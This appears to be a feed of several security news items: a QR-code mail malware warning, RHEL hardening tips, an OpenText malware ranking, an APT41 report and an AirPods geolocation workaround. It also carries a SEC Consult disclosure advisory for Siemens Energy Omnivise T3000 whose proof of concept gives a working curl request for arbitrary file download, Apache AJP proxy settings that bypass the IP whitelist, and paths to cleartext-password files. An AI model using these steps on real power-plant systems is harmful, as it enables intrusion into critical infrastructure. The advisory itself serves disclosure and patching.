A QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.

Physical letters that contain a QR code to trick people into downloading malware are being sent through the mail, according to a warning issued by The Swiss National Cyber Security Centre (NCSC).

The letters are sent as if they come from the official Swiss Federal Office of Meteorology and Climatology (MeteoSwiss) and they urge the recipient to install a new “severe weather app.”

This app, however, does not exist, and the letters do not come from MeteoSwiss either.

Scanning the QR code in the malicious letters leads to a banking Trojan known as Coper, but also referred to as Octo2. Coper is a Malware-as-a-Service which “customers” can spread as they see fit, but they pay for the use of the malicious software and the underlying infrastructure. These customers are running campaigns targeting Europe, the US, Canada, the Middle East, Singapore, and Australia.

Coper is a sophisticated banking Trojan that has several advanced features:

*   Device Takeover (DTO) capabilities for remote control
*   Advanced obfuscation techniques to avoid detection
*   Overlay attacks aimed at credential theft

The fake “meteorology app” for this malware campaign is disguised under the name “AlertSwiss” when installed on Android devices, but Coper cybercriminals can customize these names for all other campaigns. That adaptability makes for a more convincing lure depending on which country or region is being targeted. For instance, “AlertSwiss” is a clear attempt to fake the name of an official app from the Federal Office for Civil Protection which is used by federal and cantonal agencies to inform, warn, and alert the population. That real app’s name is “Alertswiss” (note the tiny difference).

Using QR codes in snail mail offers the criminals a few advantages. People may not expect to end up with their device infected by something as non-technical as a physical letter. And QR codes get typically read by mobile devices, which—unfortunately—still get overlooked when it comes to installing security software.

QR codes are becoming more common, especially after the COVID-19 pandemic which pushed many restaurants into using digital menus instead of physical menus that are shared between customers (in the earliest days of COVID lockdowns, science was still emerging on the risk levels of touching shared objects). Because of so much change in the past few years, seeing a QR code in a letter from an official institution does not trigger any alarm bells anymore.

And many Android users suffer from either a “patch gap” or are even using Android versions that are no longer supported, so will never receive another security update. One of the main causes for a patch gap is the time it takes a fix for a known vulnerability to trickle down from software vendor to individual device manufacturers, which then need to make it available for the users.

**Security advice**

*   Keeping your device up to date protects you from known vulnerabilities and helps you to stay safe.

We have found that many users have no idea whether their devices are still receiving updates. You can find your device’s Android version number, security update level, and Google Play system level in your Settings app. You’ll get notifications when updates are available for you, but you can also check for them yourself.

For most phones it works like this: Under **About phone** or **About device** you can tap on **Software updates** to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

*   Scan a QR code with the same security mindset as clicking a link

If you scan a QR code, make sure to use an app that shows you the full URL and asks you first before it visits the URL encoded in the QR code. If you do not trust the URL, don’t allow your device to open the link and, if necessary, research to find another, more trustworthy, way to get the information or download you want. Modern Android devices (version 8 and above) have a native QR code scanning capability built into the camera app. Some QR code scanner apps may have a feature that automatically executes actions like opening a website or downloading a file. Disable such features.

*   Use anti-malware protection on your devices

Your mobile devices are in need of protection just as much as your computer. Malwarebytes offers customers Malwarebytes for Android and Malwarebytes for iOS. Malwarebytes detects Coper as Android/Trojan.Banker.Ink.a.

 Malicious QR codes sent in the mail deliver malware 

Security is important in enterprise scenarios, where core business applications need to run seamlessly but are often connected to the external world where they are vulnerable to attack.Malware, unauthorized access to files and execution of unverified code are just some examples of how system security can be compromised, not only by exploiting known bugs and vulnerabilities, but also by the lack of appropriate countermeasures.Red Hat Enterprise Linux (RHEL) can help, as it provides some tools and services that can natively support the process of system hardening to help make your system more se

Security is important in enterprise scenarios, where core business applications need to run seamlessly but are often connected to the external world where they are vulnerable to attack.

Malware, unauthorized access to files and execution of unverified code are just some examples of how system security can be compromised, not only by exploiting known bugs and vulnerabilities, but also by the lack of appropriate countermeasures.

Red Hat Enterprise Linux (RHEL) can help, as it provides some tools and services that can natively support the process of system hardening to help make your system more secure.

In this article, we explore some of the tools included in RHEL that will help you start hardening your systems to better prevent access to files, processes and applications.

****Implementing access control with SELinux****

Many RHEL customers and users have experienced issues when trying to run custom applications, operating on standard folders and locations of common processes, or even just trying to open ports for their web services.

In 99% of these cases, the "issues" were caused by Security-Enhanced Linux (SELinux).

SELinux comes enabled by default in RHEL and it is a security framework that helps system administrators implement Mandatory Access Control (MAC) instead of Discretionary Access Control (DAC). MAC takes into account access modes, groups and users that can operate on files, folders and applications. Additionally, it implements a complex set of access rules, based on labels and types, that uniquely identify which processes can access specific files, folders and ports.

****MAC example****

Let's look at httpd as an example:

*   Httpd runs with a default SELinux type of **httpd\_d**
*   The folder /var/www/html/ has **httpd\_sys\_content\_t**
*   SELinux expects the process to access specific ports (80, 443, 8080, 8443 among others) and has assigned those ports a specific label, **http\_port\_t**

Suppose we try to run httpd with a different folder (i.e. /var/www/my\_site) and a different port (i.e. 4449). When we try to start the httpd service, SELinux will prevent it until we manually add the new folder and the chosen port to the labels mentioned above.

Rules for most of the applications and processes that are shipped with RHEL are already established, but they can be customized and extended to match your needs, so you can adapt them to custom applications.

Out of the box, RHEL offers a dedicated system role for Ansible that will simplify and automate the operations involving SELinux labeling and verification.

****Preventing non-standard applications from running in your environment with fapolicyd****

With SELinux we can control how processes can access files, folders and ports, but what if we want to make sure that only what comes with the RHEL can be executed?

fapolicyd is a lightweight security framework that includes a daemon whose role is to make sure that only applications that are installed as trusted RPMs can be executed.

This is possible because fapolicyd uses a specific database and a set of rules that keeps track of packages and their content that are installed using the package manager (and are present in the RPM database), so those, and only those, can be executed.

With fapolicyd installed and running in your RHEL machine, trying to create and run a Bash script or move and run the default applications present in the /usr/bin or /bin folders elsewhere in the system will result with a permission denied error.

Similar to SELinux, fapolicyd comes with a set of predefined rules that can be easily extended to match your operative requirements, also covering rules for scripts, MIME types and more.

By default, fapolicyd operates on byte size of the executable, but it can also support integrity checking.  This means that even if an attacker manages to replace an executable with a malicious version that's the same size, fapolicyd can still prevent it from running.

This is crucial when it comes to preventing unwanted applications such as rootkits, malware or any other harmful executables from running and disrupting your system.

****Intrusion detection made simple - AIDE, IMA and EVM****

One of the most common attack vectors is when existing files and processes are altered to inject malicious code or configurations, making the system vulnerable to attacks or exploits.

Advanced Intrusion Detection Environment (AIDE) is a tool, included in RHEL, that enables integrity checks for the whole system, maintaining an updated database of all files and folders to track any added or removed files, location changes or other suspicious activity.

The database can be updated using a cron job, so it is always up-to-date and aligned with the current system status.

RHEL also supports a lower-level Integrity Measurement Architecture (IMA) that is implemented at kernel level. This supports creating and maintaining hashes of all local files, and can implement a runtime check using a kernel hook to prevent executing and/or accessing files that have been altered or have failed verification checks.

If used in combination with the Extended Verification Module (EVM) kernel module, the kernel can also perform checks on the extended attributes of files, drastically reducing the chances that any modification performed by a malicious entity can compromise the integrity of the system.

****Wrap up****

The tools we discussed here are just some of the utilities and frameworks that RHEL includes to improve system security and integrity.

In a previous article, we also covered how Red Hat Insights, the SaaS (Software as a Service) solution hosted on Red Hat Console can be used to detect malware in systems.

Please don’t hesitate to contact us if you would like to learn more!

****Further reading****

*   Enhancing security with the Kernel integrity subsystem
*   RHEL Security hardening

Hardening your operating system? Red Hat Enterprise Linux to the rescue!

Siemens Energy Omnivise T3000 version 8.2 SP3 suffers from local privilege escalation, cleartext storage of passwords in configuration and log files, file system access allowing for arbitrary file download, and IP whitelist bypass.

    SEC Consult Vulnerability Lab Security Advisory < 20241112-0 >=======================================================================              title: Multiple vulnerabilities            product: Siemens Energy Omnivise T3000 vulnerable version: >=8.2 SP3      fixed version: see solution section         CVE number: CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879             impact: High           homepage: https://www.siemens-energy.com/global/en/home/products-services/product/omnivise-t3000.html              found: 2024-06-02                 by: Steffen Robertz (Office Vienna)                     Andreas Kolbeck (Office Munich)                     SEC Consult Vulnerability Lab                     An integrated part of SEC Consult, an Eviden business                     Europe | Asia                     https://www.sec-consult.com=======================================================================Vendor description:-------------------"Located in 90 countries, Siemens Energy operates across the whole energy landscape.From conventional to renewable power, from grid technology to storage to electrifyingcomplex industrial processes.Our mission is to support companies and countries with what they need to reducegreenhouse gas emissions and make energy reliable, affordable, and more sustainable.Let’s energize society."Source: https://www.siemens-energy.com/global/en/home/company/about.htmlBusiness recommendation:------------------------Siemens has released their security advisory SSA-857368, see the following URLfor further details:https://cert-portal.siemens.com/productcert/html/ssa-857368.html#mitigations-sectionFollow the mitigation instructions communicated in Omnivise T3000 Technical News 2024-089and SE Controls Security Announcement 2024-01.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)Insecurely configured services or the insecure configuration of their authorizationslead to privilege escalation vulnerabilities in the Windows operating system. It ispossible for a low-privileged user to modify a service in such a way that it executesarbitrary code instead of starting the actual service. The service path is writable bythe "Authenticated Users" group.Precondition for exploitation: requires authenticated local access to the Terminal Serverof the T3000 system.2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)Multiple files containing cleartext passwords were discovered. These can be usedto jump from host to host and thus compromise the whole security architecture ofthe T3000 system.Precondition for exploitation: requires administrative local access to any server of theT3000 system.3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)The RemoteDiagnosticView application is a web application hosted on the applicationserver. One parameter accepts a full path, which can be abused to download arbitraryfiles.Precondition for exploitation: requires administrative remote access to the Applicationserver of the T3000 system.4) IP Whitelist Bypass (CVE-2024-38879)The application server is hosting the T3000 web application on port 8080. However,only the Terminal Server is whitelisted. This whitelisting can be circumvented byexploiting the additionally exposed Tomcat AJP service on port 8009.Precondition for exploitation: requires unauthenticated remote access to the Applicationserver of the T3000 systemProof of concept:-----------------1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)The following path hosts a file that is used by the "DSGW Service" of the T3000 system:"E:\dsgw\gw\bin\dsgwservice.exe"The path is writable by the "Authenticated Users" group.2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)Multiple files containing cleartext passwords were discovered.Terminal Server:* C:\Program Files\SPPA-T3000\snmpv3trap\Config.properties (only readable by Admin)* E:\DSGW\GW\config_PDC.properties (Passwords are Base64 encoded)* C:\Program Files\SPPA-T3000\Logs\AppInstallLogs\PostInstallConfigList.xml (Readable by every user)Application Server:* D:\SPPA-T3000\_framework\_jre\installvariables.properties (contains passwords of tomcat and MySQL service* D:\SPPA-T3000\Orion\install\_uninstall\installvariables.properties (contains password for MySQL service and installation)All Servers:All servers are being deployed via Puppet. However, the cache file is nevercleared and contains the initial passwords of all systems of the T3000 system:"C:\Program Data\PuppetLabs\puppet\cache\client_data\catalog\<uid.json>"---------------------------------------[...]"parameters": {"foreman_pass": "[redacted]","foreman_url": "[redacted]","foreman_user": "puppet_provider","is_sec": "true","mpssvc_pass": "[redacted]"}[...]"parameters": {"crsphost": "XXX.XXX.XXX.XXX","crsppswd": "","crsprepo": "AVPatterns","crspservice": "SFTP","crspuser": "siem_t3000_west","primary_ts": true}[...]"parameters": {[...]"snmpv3_authpass": "[redacted]","snmpv3_privpass": "[redacted]","snmpv3_user": "snmpuser","snmpv3_hash": "SHA","snmpv3_encrypt": "AES"}[...]"parameters": {[...]"cyg_server_passwd": "[redacted]",[...]"fst_appsrv_passwd": "","fst_appsrv_red_hgw_ip": "XXX.XXX.XXX.XXX",[...]"icmauser_passwd": "[redacted]",[...]"opcadmin_passwd": "[redacted]","operator01_passwd": "[redacted]","operator02_passwd": "[redacted]","operator03_passwd": "[redacted]","operator04_passwd": "[redacted]","operator05_passwd": "[redacted]","operator06_passwd": "[redacted]","operator07_passwd": "[redacted]","operator08_passwd": "[redacted]","operator09_passwd": "[redacted]","operator10_passwd": "[redacted]","operators_password": "[redacted]","pdm01_passwd": "[redacted]","pdm02_passwd": "[redacted]","pdm03_passwd": "[redacted]","pdm04_passwd": "[redacted]","pdm05_passwd": "[redacted]","pdm06_passwd": "[redacted]","pdm07_passwd": "[redacted]","pdm08_passwd": "[redacted]","pdm09_passwd": "[redacted]","pdm10_passwd": "[redacted]","pmas_passwd": "[redacted]","pmsvc_passwd": "[redacted]","pmts_passwd": "[redacted]","reparchive_passwd": "[redacted]",[...]"t3kservice_passwd": "[redacted]","[...]"tomcatadmin_passwd": "[redacted]","tsuser01_passwd": "[redacted]","tsuser02_passwd": "[redacted]","tsuser03_passwd": "[redacted]","tsuser04_passwd": "[redacted]","tsuser05_passwd": "[redacted]","tsuser06_passwd": "[redacted]","tsuser07_passwd": "[redacted]","tsuser08_passwd": "[redacted]","tsuser09_passwd": "[redacted]","tsuser10_passwd": "[redacted]","txpdomain_passwd": "[redacted]",[...]"vm_r8_passwd": "[redacted]",[...]"vm_tc_passwd": "[redacted]",[...]"vm_ts_passwd": "[redacted]",[...]"vm_whitelist_hostname": "","vm_whitelist_passwd": "","wbuser01_passwd": "[redacted]","wbuser02_passwd": "[redacted]","wbuser03_passwd": "[redacted]","wbuser04_passwd": "[redacted]","wbuser05_passwd": "[redacted]","wbuser06_passwd": "[redacted]","wbuser07_passwd": "[redacted]","wbuser08_passwd": "[redacted]","wbuser09_passwd": "[redacted]","wbuser10_passwd": "[redacted]","wra01_passwd": "[redacted]",[...]"dsrm_passwd": "[redacted]",[...]"dc_passwd": "[redacted]",[...]"patchsvc_passwd": "[redacted]",}--------------------------------------------------To understand the impact of this file, we have to explain a little about the T3000 system.The system is split into three levels: Operator, Automation and Process.Operator Level: This is the level, where thin clients are situated. In our testcase,this level consisted of the Terminal Server that engineers could connect to. From here,they start the T3000 application, which simply loads a browser and displays a Javaapplication served from the Application Server.Automation Level: This level consists of application and automation servers. The applicationserver hosts the not time critical components of power generations such as the web server.The automation servers are taking care of time critical operations. In our testcase thesewere PLCs from the SIMATIC S7-CPU family.Process Level: This level consists of the I/O modules that are controlled by the automationservers.The Terminal Server, located on the operator level already contained the Puppet cache file,which contained all the local Windows users used in the T3000 system in clear text. As theTerminal Server communicates with the Application Server, they have to be connected via network.Thus, the attacker can use the credentials on the Terminal Server to jump to the ApplicationServer. This server is in the same segment as the physical PLC CPUs. Thus an attacker can nowalso control the PLCs and thus the whole power plant.In order to read the Puppet cache file, an attacker has to gain local admin rights first.For this, vulnerability 1 can be used.3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)The RemoteDiagnosticView website is hosted at the following URL:http:// <IP Application Server>:8080/RemoteDiagnosticViewIn our testcase it was configured using default credentials with the following username andan easy to guess password:txpadmin:[redacted]Using these credentials an attacker gains an authenticated session. From there, one cansimply download arbitrary files:------------------------Curl -H "Cookie: JSESSIONID=31B4F2F1BAFC473AB41B65DDF2FD10BA;" -I -H "Content-Type:application/x-www-form-urlencoded" -X POST -d "filename=D:\sectest.txt&type=TEXT"http://$host:8080/RemoteDiagnosticView/DataServletHTTP/1.1 200Content-Type: text/plainTransfer-Encoding: chunked[...]Sectest---------------------------------4) IP Whitelist Bypass (CVE-2024-38879)The AJP protocol can be used to proxy requests from an Apache server to an applicationrunning on Tomcat. By setting up a local Apache server and configuring it to use theAJP service of the Application Server, the IP filter is circumvented.The following setup was built:------------------------------sudo apt-get install libapache2-mod-jksudo vim /etc/apache2/apache2.conf# append the following line to the config   Include ajp.confsudo vim /etc/apache2/ajp.conf# create the following file    ProxyRequests Off    <Proxy *>       Order deny,allow       Deny from all       Allow from localhost    </Proxy>    ProxyPass   / ajp://<Application Server IP>:8009/   ProxyPassReverse   / ajp://<Application Server IP>:8009/sudo a2enmod proxy_httpsudo a2enmod proxy_ajpsudo systemctl restart apache2--------------------------Afterwards, the e.g. RemoteDiagnosticView can be loaded from http://127.0.0.1/RemoteDiagnosticViewVulnerable / tested versions:-----------------------------The following version has been tested which was the latest version availableat the time of the test:* 8.2According to the vendor (T3000 SE Controls Security Announcement 2024/01 Update 1),the following versions and components are affected:All T3000 Versions >= Release 8.2 SP3:* Security Server* Thin Clients* Terminal Server* Application Server* Domain Controller* PDM VM* Whitelisting VM* NIDSVendor contact timeline:------------------------2024-06-05: Contacting vendor through productcert@siemens.com2024-06-06: Siemens assigned S-PCERT#408502024-06-12: Reaching out to specific contacts at Siemens Energy Cybersecurity.2024-06-13: They confirm that ProductCERT will get back to us once they have a timeline.2024-06-19: Customer informs us about a Siemens Energy Document that recommends to            change passwords after installation. The document is called "SE Controls            Security Announcement 2024/01" but only available to T3000 customers.2024-06-20: Sending feedback about the document to Siemens Energy Cybersecurity            as in our opinion it does not solve the issues.2024-06-20: They confirm again that ProductCERT is taking care of issues. Asks            to confirm that we received their messages, which we didn't -> Realized            that one of our email addresses was dropped during the communication,            recovered emails from second account.2024-06-17/2024-06-24: ProductCERT informs:            Vulnerability 1 cannot be reproduced in the reference installation.                 The product team is working to find potentially affected installation                 scenarios.            Vulnerability 2 was reproduced and the product team is working on a mitigation.                 Also, a related customer information has been distributed to customers.            Vulnerability 3 will be fixed in the next release of the T3000 distribution            Vulnerability 4 is already fixed in the current version. The product team is                 investigating, if this vulnerability is present in still supported versions.2024-06-21: ProductCERT informs us that they are able to reproduce all of the vulnerabilities            and provide fixes for most of them. Advisory draft should be shared with            SEC Consult next week. Ask to keep communication directed at ProductCERT            instead of Cybersecurity team.2024-06-28: ProductCERT sends over advisory draft. Could reproduce all vulnerabilities            and requested CVEs.2024-07-03: Siemens ProductCERT requests if we received the draft, as SEC Consult didn't answer yet.2024-07-03: SEC Consult confirms the reception of the advisory draft.2024-07-04: Submitted feedback for advisory draft to ProductCERT. From SEC Consult's            understanding, changing passwords after initial installation only fixes the            cleartext passwords in log files. The puppet issue would not be fixed.            Thus SEC Consult proposed to split Vulnerability 2 into two separate findings.2024-07-05: ProductCERT forwarded feedback to product team.2024-08-02: ProductCERT publishes SSA-857368.2024-08-05: Informing ProductCERT of vacation/absences, will coordinate further afterwards.2024-10-03: Proposing a meeting with ProductCERT to clarify and discuss all open issues.2024-10-22: Meeting with ProductCERT.2024-10-24: ProductCERT sends us further documents for T3000 regarding fixes/mitigations.2024-10-31: Sending advisory draft to ProductCERT, proposing advisory release date for 7th            November.2024-11-06: Receiving feedback from ProductCERT, postponing release to 12th November.2024-11-12: Coordinated release of advisory.Solution:---------Change the passwords to all components. Detailed instructions and patch informationcan be found when following Omnivise T3000 Technical News 2024-089 and SE ControlsSecurity Announcement 2024-01.Release 9.2 Fix / Mitigations:Issue 1 (CVE-2024-38876)* System Software Patch 22.173.20* System Software Patch 22.173.52* Application Software Patch 09.0.19.06Issue 2 (CVE-2024-38877)* System Software Patches 22.173.52* Application Software Patch 09.0.19.06* Technical News 2024-089Issue 3 (CVE-2024-38878)* Application Software Patch 09.0.19.06Issue 4 (CVE-2024-38879)* Application Software Patch 09.0.19.06Release 8.2 SP4 Fix / Mitigations:Patches are currently under development.Release 8.2 SP3 Fix / Mitigations:Currently no fixes are planned, but see Technical News 2024-089 for issue 2 (CVE-2024-38877)Workaround:-----------Limit access to the terminal servers.CVE-2024-38877: If the passwords are suspected to be compromised, change the passwordsfor all computers and service accounts. In addition follow the instructions fromOmnivise T3000 Technical News 2024-089, which is available through T3000 customerservice and applies to releases 8.2 SP3/SP4 and 9.2.Advisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Steffen Robertz, Andreas Kolbeck/ @2024

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download

PRESS RELEASE

WATERLOO, ON, Oct. 31, 2024 /PRNewswire/ -- OpenText (NASDAQ: OTEX), (TSX: OTEX), has revealed its highly anticipated "Nastiest Malware of 2024" list, spotlighting the year's most notorious cyber threats. Now in its seventh year, OpenText's cybersecurity experts have identified the most relentless and adaptive malware trends impacting industries worldwide. This year, ransomware aimed at critical infrastructure takes center stage, highlighting an urgent call for reinforced security to protect vital services. In response, organizations are projected to increase their cybersecurity investments by 14.3% in 2024, reaching more than $215 billion.

Once again, ransomware group LockBit secures the #1 spot as the nastiest malware of the year. Known for its resilience and relentless pursuit of critical targets, LockBit has successfully dodged multiple law enforcement crackdowns. According to the FBI's 2023 2023 Internet Crime report, LockBit was reported in 175 attacks on critical infrastructure, underscoring its staying power and adaptability. The ongoing standoff between the FBI and LockBit shows the gritty persistence of today's ransomware market and its growing sophistication. For several months now, the battle for dominance between the FBI and LockBit has highlighted the persistence of the ransomware market and how as technology evolves these threats continually lurk in the shadows.    

"Ransomware attacks on critical infrastructure are on the rise, and cybercriminals are increasingly using artificial intelligence to develop highly personalized threats, which significantly endangers national security and public safety," said Muhi Majzoub, EVP and Chief Product Officer, OpenText. "However, the increased attention on ransomware and cybersecurity is encouraging, as more organizations are proactively prioritizing cybersecurity investments. This commitment highlights their dedication to safeguarding essential services from evolving threats." The 2024 list showcases how adaptive and innovative each ransomware is, but also how well these threats push boundaries. With their malicious capabilities and evasiveness, these cybercriminals continue to find new ways to surpass our darkest expectations.

2024's Nastiest Malware Hall of Infamy: 

1.  LockBit: This ransomware-as-a-service (RaaS) heavyweight leads the pack again, unfazed by FBI efforts to take it down. LockBit's aim? Target one million businesses before calling it quits, solidifying its spot as a top ransomware menace in 2024.
    
2.  Akira: A fresh and ferocious entry, Akira brings a splash of '80s aesthetics to the dark web, quickly climbing the ranks with ruthless encryption tactics and swift deployment. It's especially active in healthcare, manufacturing, and finance, cementing itself as a go-to Ransomware-as-a-Service (RaaS) model for affiliates.
    
3.  RansomHub: Rumored to be a descendant of the Black Cat (ALPHV) group, RansomHub burst onto the scene targeting high-profile organizations. After attacking Planned Parenthood, this group made headlines by stealing and ransoming sensitive patient data, threatening public exposure.
    
4.  Dark Angels: Known for its laser-focused, high-impact attacks on top-tier targets, Dark Angels doesn't hold back. Using advanced infiltration methods, they've secured ransom payments as high as $75 million, leaving their mark on one of the year's biggest Fortune 50 attacks.
    
5.  Redline: Not ransomware but still formidable, Redline Stealer specializes in stealing credentials and sensitive information with skillful evasion tactics, making it a persistent headache across various sectors.
    
6.  Play Ransomware: Making waves with high-profile attacks, Play Ransomware is as versatile as it is relentless. From targeting public and private sectors to exploiting FortiOS vulnerabilities and RDP servers, this group keeps victims on their toes with ever-evolving techniques.
    

Want the full rundown? Visit the OpenText Cybersecurity Community, view the infographic, and join us for our "Nastiest Malware Webinar" to dive deeper into this year's findings and stay ahead of emerging threats!

About OpenText Cybersecurity  
OpenText Cybersecurity provides comprehensive security solutions for companies and partners of all sizes. From prevention, detection and response to recovery, investigation and compliance, our unified/end-to-end platform helps customers build cyber resilience via a holistic security portfolio. Powered by actionable insights from our real-time and contextual threat intelligence, OpenText Cybersecurity customers benefit from high-efficacy products, compliant experience and simplified security to help manage business risk.

About OpenText   
OpenText™ is the leading Information Management software and services company in the world.  We help organizations solve complex global problems with a comprehensive suite of Business Clouds, Business AI, and Business Technology.  For more information about OpenText (NASDAQ/TSX: OTEX), please visit us at www.opentext.com.

Connect with us:

OpenText CEO Mark Barrenechea's blog  
Twitter | LinkedIn 

Certain statements in this press release may contain words considered forward-looking statements or information under applicable securities laws. These statements are based on OpenText's current expectations, estimates, forecasts and projections about the operating environment, economies, and markets in which the company operates. These statements are subject to important assumptions, risks and uncertainties that are difficult to predict, and the actual outcome may be materially different. OpenText's assumptions, although considered reasonable by the company at the date of this press release, may prove to be inaccurate and consequently its actual results could differ materially from the expectations set out herein. For additional information with respect to risks and other factors which could occur, see OpenText's Annual Report on Form 10-K, Quarterly Reports on Form 10-Q and other securities filings with the SEC and other securities regulators. Readers are cautioned not to place undue reliance upon any such forward-looking statements, which speak only as of the date made. Unless otherwise required by applicable securities laws, OpenText disclaims any intention or obligations to update or revise any forward-looking statements, whether as a result of new information, future events or otherwise. Further, readers should note that we may announce information using our website, press releases, securities law filings, public conference calls, webcasts and the social media channels identified on the Investors section of our website (https://investors.opentext.com). Such social media channels may include the Company's or our CEO's blog, Twitter account or LinkedIn account. The information posted through such channels may be material. Accordingly, readers should monitor such channels in addition to our other forms of communication.

OpenText Cybersecurity Unveils 2024's Nastiest Malware

The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.

Source: u3d via Shutterstock

China's APT41 threat group is using a sophisticated Windows-based surveillance toolkit in a cyber-espionage campaign targeting organizations in South Asia.

The malware adds to the already broad portfolio of malicious tools that the threat actor has deployed in recent years and makes APT41 an even more pernicious threat to targeted enterprises.

**Optimized Plug-ins**

Researchers at BlackBerry, among the many who are tracking the threat actor, spotted the new malware toolkit earlier this year and have dubbed it "DeepData Framework." Their analysis showed it to be a highly modular toolkit that supports as many as 12 separate plug-ins, each one optimized for a specific malicious function.

Four of the plug-ins steal communications from WhatsApp, Signal, Telegram, and WeChat. Another three are rigged to steal and exfiltrate system information, Wi-Fi network data, and information on all installed applications on the compromised system — including names and installation paths. Three DeepData plug-ins steal information related to browsing history and cookies; they also grab passwords from Web browsers, Baidu storage services, FoxMail, and other cloud services, and other information like user emails and contact lists in Microsoft Outlook. The remaining two plug-ins enable theft of audio files from compromised systems.

Blackberry researchers chanced upon DeepData when conducting an investigation of "LightSpy," an iOS implant that they have tracked APT41 using in an ongoing and wide-ranging mobile espionage campaign against targets in India and South Asia. Their analysis showed DeepData to have a similar design to LightSpy in that both have a core module and support for multiple data theft plug-ins.

Significantly, DeepData appears to be a malware toolkit that the attackers are manually interacting with after compromising a target and gaining access. "The \[command and control\] address is also specified as a command line argument, as are the requested plugins to be run or data to extract," Blackberry's research and intelligence team said in a blog post this week. "The implication of this execution method is that it must be done manually, sans a script or some other bundling distribution."

**Surveillance Powers Continue to Grow**

DeepData adds to APT41's already formidable surveillance and cyber espionage capabilities. The malicious framework is an example of the constantly emerging threats that organizations have to deal with when trying to mitigate threats from advanced persistent threat groups and nation-state bad actors. "Our latest findings indicate that the threat actor behind DeepData has a clear focus on long-term intelligence gathering," BlackBerry said. Since first deploying LightSpy in 2022, the threat actor has methodically and strategically bulked up its capabilities to intercept communications and steal data in total stealth, BlackBerry said.

APT41 is a known threat actor that security vendors and researchers have been variously tracking as Winnti, WickedPanda, Barium, Wicked Spider, and other names. Some vendors consider APT41 to be a collection of smaller subgroups collectively working at the behest of, or on behalf of the Chinese government. The group's mandate appears to be very broad, based on its targets and the kind of campaigns it has conducted in recent years.

Most recently, researchers tied APT41 to attacks targeting global logistics and utilities companies, and to a campaign that targeted research entities in Taiwan. Over the years, the group has stolen data from a wide range of organizations, including intellectual property and trade secrets from healthcare organizations, media and entertainment companies, government agencies, automative firms, retailers, energy companies, pharmaceutical companies, and others. Its activities prompted a US government investigation and subsequent indictment of five alleged members of APT41 back in 2020. Its victims have spanned Europe, Asia, and North America.

The group's latest South Asian campaign appears aimed at politicians, journalists, and political activists in the region, according to BlackBerry. "Organizations of all sizes, particularly those in targeted regions, should treat this threat as a high priority and implement comprehensive defensive measures."

The company's recommended mitigation measures include blocking the group's known C2 infrastructure, monitoring networks and devices for unexpected audio recording activities, using secure communications for transmitting data, and deploying the detection rules that BlackBerry has released for DeepData components.  

Don't miss the upcoming free Dark Reading Virtual Event, "Know Your Enemy: Understanding Cybercriminals and Nation-State Threat Actors," Nov. 14 at 11 a.m. ET. Don't miss sessions on understanding MITRE ATT&CK, using proactive security as a weapon, and a masterclass in incident response; and a host of top speakers like Larry Larsen from the Navy Credit Federal Union, former Kaspersky Lab analyst Costin Raiu, Ben Read of Mandiant Intelligence, Rob Lee from SANS, and Elvia Finalle from Omdia. Register now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Toolkit Vastly Expands APT41's Surveillance Powers

Three technologists in India used a homemade Faraday cage and a microwave oven to get around Apple’s location blocks.

When Apple released a software update at the start of November that enabled its new hearing aid features in AirPods Pro 2 earbuds, Rithwik Jayasimha immediately went out with his dad to buy a pair for his grandma. “We came back home, we took them out of the case, and I was looking for the feature and it was just missing,” Jayasimha says. India, where Jayasimha and his family live, is not one of the many countries where Apple’s hearing aid features are available. “It was a huge bummer,” Jayasimha says.

Instead of abandoning the headphones, Jayasimha and two friends, Arnav Bansal and Rithvik Vibhu—both of whom say they have grandmas who use hearing aids as well—hacked a way to bypass Apple’s location restrictions and enable their hearing aids in Bangalore.

To dodge Apple’s geolocation restrictions, the trio built a rudimentary, signal-blocking Faraday cage on top of a microwave with aluminum foil, which ultimately allowed them to enable the hearing aid settings. “We don’t even think it’s Apple’s fault. The feature is amazing,” Jayasimha says.

One of the older hearing aids that was replaced with an Apple’s AirPods Pro 2.Photograph: Lagrange Point/Rithwik Jayasimha

